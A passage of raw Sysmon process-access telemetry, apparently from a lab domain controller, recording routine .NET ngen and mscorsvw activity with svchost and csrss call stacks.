ramework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FC01-00000000A301}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.749{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FC01-00000000A301}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.749{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FC01-00000000A301}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FB01-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.687{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FB01-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.687{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FB01-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.624{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FA01-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.609{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FA01-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.609{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FA01-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F901-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F901-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F901-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.531{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F801-00000000A301}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F801-00000000A301}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F801-00000000A301}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.499{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F701-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.499{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F701-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.499{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F701-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F601-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.421{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F601-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.421{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F601-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.390{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F501-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.390{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F501-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
